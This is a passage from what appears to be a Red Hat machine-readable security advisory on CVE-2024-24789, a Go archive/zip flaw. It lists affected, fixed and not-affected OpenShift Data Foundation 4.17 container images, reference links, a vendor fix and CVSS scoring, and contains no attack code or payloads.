"Vulnerability description", }, { category: "summary", text: "golang: archive/zip: Incorrect handling of certain ZIP files", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24789", }, { category: "external", summary: "RHBZ#2292668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292668", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24789", url: "https://www.cve.org/CVERecord?id=CVE-2024-24789", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24789", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24789", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", 